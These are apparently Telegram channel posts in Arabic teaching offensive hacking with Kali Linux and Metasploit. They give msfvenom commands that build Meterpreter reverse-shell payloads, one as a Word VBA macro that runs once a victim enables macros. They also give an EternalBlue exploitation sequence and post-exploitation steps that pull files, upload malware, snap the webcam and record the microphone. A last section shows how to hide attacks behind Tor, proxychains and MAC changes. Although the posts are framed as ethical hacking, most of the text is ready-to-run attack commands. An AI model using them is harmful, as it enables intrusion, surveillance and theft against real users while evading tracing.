📄 9. إنشاء Payload على هيئة VBA Macro (للهجوم عبر ملفات Word)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f vba > macro.vba
📌 مجرد ما الضحية يفتح ملف Word ويفعل الـ Macros، الـ Payload هيشتغل في الخلفية! ━━━━━━━━━━━━━━━━━━
💻 10. إنشاء Payload مخصص باستخدام Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f c

Repost from Global Red Team
أوامر إضافية مهمة في Metasploit
db_nmap:
يستخدم هذا الأمر لتشغيل فحص Nmap داخل Metasploit. الأداة دي بتساعدك في فحص الأجهزة المتصلة على الشبكة وبتديك معلومات عن الخدمات اللي بتشغلها.
db_nmap -sS 192.168.1.1
━━━━━━━━━━━━━━━━━━
load:
هذا الأمر بيستخدم لتحميل وحدات (modules) أو مكتبات إضافية في Metasploit. مثلاً، لو حابب تضيف وحدة جديدة للعمل على الثغرات.
load post/windows/manage/enum_logged_on_users
━━━━━━━━━━━━━━━━━━
setg:
لو حابب تعيين قيمة معينة (مثل الـ RHOST أو الـ LHOST) بشكل عام لكل الجلسات أو لكل الـ exploits المفتوحة، يمكنك استخدام هذا الأمر.
setg RHOST 192.168.1.100
━━━━━━━━━━━━━━━━━━
show exploits:
يعرض لك جميع الثغرات (exploits) المتاحة داخل Metasploit. ده هيساعدك على معرفة الثغرات اللي تقدر تشتغل عليها.
show exploits
━━━━━━━━━━━━━━━━━━
show payloads:
يعرض لك جميع الـ payloads المتاحة. الـ payload هو الكود اللي هينفذ بعد استغلال الثغرة.
show payloads
━━━━━━━━━━━━━━━━━━
show auxiliary:
يعرض لك الأدوات المساعدة (auxiliary modules) اللي بتكون مفيدة في الهجمات. الأدوات دي مش بالضرورة تستغل ثغرة، ولكن بتساعد في تنفيذ مهام معينة زي فحص الشبكات.
show auxiliary
━━━━━━━━━━━━━━━━━━
use auxiliary:
هذا الأمر بيستخدم لاختيار أداة مساعدة معينة من بين الأدوات المتاحة، لتشغيل فحص أو خدمة معينة.
use auxiliary/scanner/portscan/tcp
━━━━━━━━━━━━━━━━━━
set PAYLOAD:
يحدد الـ payload اللي هتستخدمه في استغلال الثغرة. بعد تحديد الـ exploit، يجب تحديد الـ payload ليتم تنفيذه بعد استغلال الثغرة.
set PAYLOAD windows/meterpreter/reverse_tcp
━━━━━━━━━━━━━━━━━━
run post:
بعد ما تستغل الثغرة وتتحكم في النظام، ممكن تستخدم أوامر الـ post exploitation لتنفذ مهام معينة بعد استغلال الثغرة.
run post/windows/gather/enum_users
━━━━━━━━━━━━━━━━━━
exploit -j:
هذا الأمر بيشغل الاستغلال في الخلفية (background) وبيبدأ في تنفيذ الـ payload.
exploit -j
━━━━━━━━━━━━━━━━━━
sessions -i:
هذا الأمر بيستخدم للتفاعل مع جلسة معينة بعد استغلال الثغرة بنجاح. يعني تقدر تتفاعل مع الجلسة المفتوحة علشان تبدأ في استخدام النظام المخترق.
sessions -i 1
━━━━━━━━━━━━━━━━━━
sessions -k 1
يستخدم هذا الأمر لإنهاء جلسة معينة. مثلاً، لو كنت مش عايز الجلسة تشتغل تقدر تقفلها.
sessions -k 1
━━━━━━━━━━━━━━━━━━
jobs:
يعرض لك جميع الوظائف اللي شغالة في الخلفية، زي العمليات اللي مش مرتبطة مباشرة بالجلسات ولكن شغالة على النظام.
jobs

Repost from Global Red Team
كل اللي محتاج تعرفه عن الـ Metasploit وأهم أوامره إيه هو الـ Metasploit؟
الـ Metasploit Framework هو واحد من أقوى وأشهر الأدوات في مجال اختبار الاختراق (Penetration Testing). الأداءة دي بتساعد الهاكر الأخلاقي والمختبر الأمني إنه يلاقي الثغرات ويستغلها بشكل آمن عشان يقيّم مستوى أمان الأنظمة والشبكات. ببساطة، هو عبارة عن بيئة متكاملة بتحتوي على عدد ضخم من الأدوات والاستغلالات الجاهزة (Exploits) اللي بتساعد في تنفيذ هجمات منظمة على الأنظمة عشان تعرف نقاط الضعف وتصلّحها قبل ما الهاكرز يستغلوها.
أهمية الـ Metasploit؟
توفير قاعدة بيانات ضخمة من الثغرات: يعني أي ثغرة جديدة بتضاف في قاعدة بياناته، وده بيساعدك تشتغل بأحدث المعلومات. سهولة استخدامه: سواء كنت محترف أو لسه مبتدئ، تقدر تتعامل معاه بسهولة لأنه بيوفر واجهة سطر أوامر CLI وواجهة رسومية GUI. اختبار الأمان بشكل عملي: تقدر تشوف بنفسك لو النظام بتاعك فيه مشاكل أمنية وتصلحها قبل ما حد يستغلها ضدك. تكامل مع أدوات تانية: ممكن تدمجه مع Nmap، Nessus، وBurp Suite لزيادة كفاءة الاختبار الأمني.
أهم أوامر الـ Metasploit
أول حاجة بعد ما تشغل الـ Metasploit، هتدخل بيئة الأوامر الخاصة بيه عن طريق:
msfconsole
بعدها تقدر تستخدم الأوامر دي: ━━━━━━━━━━━━━━━━━━
1. أوامر البحث عن الثغرات (Exploits & Payloads)
البحث عن ثغرة معينة:
search اسم_الثغرة
مثال:
search ms17-010
عرض تفاصيل ثغرة معينة:
info exploit/windows/smb/ms17_010_eternalblue
اختيار ثغرة عشان تشتغل بيها:
use exploit/windows/smb/ms17_010_eternalblue
━━━━━━━━━━━━━━━━━━
2. أوامر إعداد الاستغلال (Setting Exploit Options)
عرض الإعدادات المطلوبة للثغرة المختارة:
show options
تحديد الهدف (Target IP):
set RHOSTS 192.168.1.100
تحديد البورت (لو مطلوب):
set RPORT 445
━━━━━━━━━━━━━━━━━━
3. أوامر اختيار الـ Payload
الـ Payload هو الكود اللي بيتنفذ بعد نجاح الاستغلال عشان تقدر تسيطر على الجهاز. عرض الـ Payloads المتاحة:
show payloads
اختيار Payload معين:
set PAYLOAD windows/meterpreter/reverse_tcp
تحديد الآي بي الخاص بك لاستقبال الاتصال العكسي (Reverse Shell):
set LHOST 192.168.1.101
تحديد البورت اللي هتستقبل عليه الاتصال:
set LPORT 4444
━━━━━━━━━━━━━━━━━━
4. تنفيذ الهجوم
بعد ما تظبط كل الإعدادات، تقدر تنفذ الهجوم باستخدام:
exploit
أو
run
━━━━━━━━━━━━━━━━━━
5. أوامر التحكم بعد الاختراق (Meterpreter Commands)
لو الهجوم نجح، هتدخل على جلسة Meterpreter اللي بتوفر لك تحكم كامل في الجهاز المخترق. عرض معلومات عن النظام المخترق:
sysinfo
معرفة المستخدم الحالي:
getuid
الحصول على سطر أوامر الجهاز المخترق (Windows CMD أو Linux Shell):
shell
التنقل بين الملفات على الجهاز المخترق:
ls
تحميل ملف من الجهاز المخترق:
download C:\\Users\\Admin\\Desktop\\file.txt /home/kali/
رفع ملف إلى الجهاز المخترق:
upload /home/kali/malware.exe C:\\Users\\Admin\\Desktop\\malware.exe
تشغيل الكاميرا (لو اللابتوب فيه كاميرا):
webcam_list webcam_snap
التحكم في الميكروفون والتسجيل:
record_mic
━━━━━━━━━━━━━━━━━━
6. أوامر الخروج
إغلاق جلسة الـ Meterpreter:
exit
إغلاق الـ Metasploit Console:
exit
الخلاصة الـ Metasploit مش مجرد أداة اختراق، لكنه بيئة متكاملة لاختبار الأمان ومعرفة الثغرات في الأنظمة. سواء كنت شغال في الهاكينج الأخلاقي أو أمن المعلومات، لازم تتعلمه وتستخدمه بشكل قانوني عشان تحمي الأنظمة مش تهاجمها.

🚀 كيف تستخدم كالي لينكس بدون ترك أثر؟ (التخفي والأنونيموس) 🔥
في عالم الاختبار الأمني، الخصوصية والتخفي أمران أساسيان، خاصة عند إجراء تحليل أمني أو اختبار اختراق قانوني. اليوم، سنتعلم كيف تستخدم كالي لينكس بدون ترك أثر، سواء كنت تتصفح الإنترنت، تجري عمليات فحص، أو تتصل بالخوادم.
1️⃣ تشغيل Tor وإخفاء عنوان الـ IP 🕵️‍♂️
شبكة Tor تُساعدك في تمرير اتصالك عبر عدة خوادم مشفّرة، مما يجعل تتبعك أمرًا صعبًا. ✅ تثبيت وتشغيل Tor:
sudo apt install tor -y sudo service tor start
✅ استخدام Tor مع الأدوات مثل Nmap و SQLMap:
proxychains nmap -sT -Pn -p 80,443 target.com proxychains sqlmap -u "http://target.com/index.php?id=1" --dbs
🔹 ProxyChains سيجعل الأدوات تستخدم شبكة Tor تلقائيًا، مما يخفي عنوان الـ IP الخاص بك. ━━━━━━━━━━━━━━━━━━
2️⃣ تغيير MAC Address لمنع التتبع 🏴
كل جهاز متصل بعنوان MAC فريد يمكن تعقبه. ✅ لعرض MAC Address الحالي:
ifconfig wlan0 | grep ether
✅ إيقاف الشبكة وتغيير العنوان:
sudo ifconfig wlan0 down sudo macchanger -r wlan0 sudo ifconfig wlan0 up
🔹 سيقوم macchanger بتغيير عنوان MAC الخاص بك عشوائيًا، مما يجعل تتبعك صعبًا على الشبكة. ━━━━━━━━━━━━━━━━━━
3️⃣ استخدام متصفح Tor للتصفح الآمن 🌍
✅ للدخول إلى الإنترنت بدون كشف هويتك، قم بتحميل وتشغيل متصفح Tor:
sudo apt install torbrowser-launcher -y torbrowser-launcher
🔹 الآن يمكنك تصفح الإنترنت بدون ترك أي أثر رقمي! ━━━━━━━━━━━━━━━━━━
4️⃣ منع تسريب بيانات النظام إلى الإنترنت 🚫
أحيانًا، بعض التطبيقات ترسل بيانات عن جهازك بدون علمك. ✅ لتفعيل جدار ناري (Firewall) واستخدام UFW:
sudo apt install ufw -y sudo ufw default deny outgoing sudo ufw default deny incoming sudo ufw allow out on tor sudo ufw enable
🔹 هذا سيمنع أي تطبيق من إرسال بيانات خارجية إلا عبر Tor. ━━━━━━━━━━━━━━━━━━
5️⃣ استخدام نظام وهمي أو USB Live Mode 🖥️
✅ لتجنب ترك أي أثر على جهازك الحقيقي: تشغيل كالي لينكس على VirtualBox: استخدم نظام وهمي (VM) حتى لا تتأثر بياناتك الحقيقية. تشغيل كالي لينكس من USB مباشرة بدون تثبيت: استخدم Live USB عند الإقلاع، بحيث لا يتم تخزين أي بيانات على الهارد الخاص بك. ━━━━━━━━━━━━━━━━━━
🔥 الخلاصة: كن مجهولًا، لا تترك أثرًا! استخدم Tor + ProxyChains لإخفاء عنوان IP الخاص بك.
غيّر MAC Address بانتظام. استخدم Tor Browser للتصفح الآمن. فعّل جدار الحماية (UFW) لمنع التسريبات. استخدم نظام وهمي أو Live USB لتجنب ترك أي أثر على جهازك. 🚀 انضم لقناتنا على تليجرام لتتعلم أقوى تريكات كالي لينكس وأدوات الاختبار الأمني 🔥💻 📢 تابعنا الآن: https://t.me/k7ali_linux https://t.me/k7ali_linux https://t.me/k7ali_linux #kali #linux #tools #hacker #github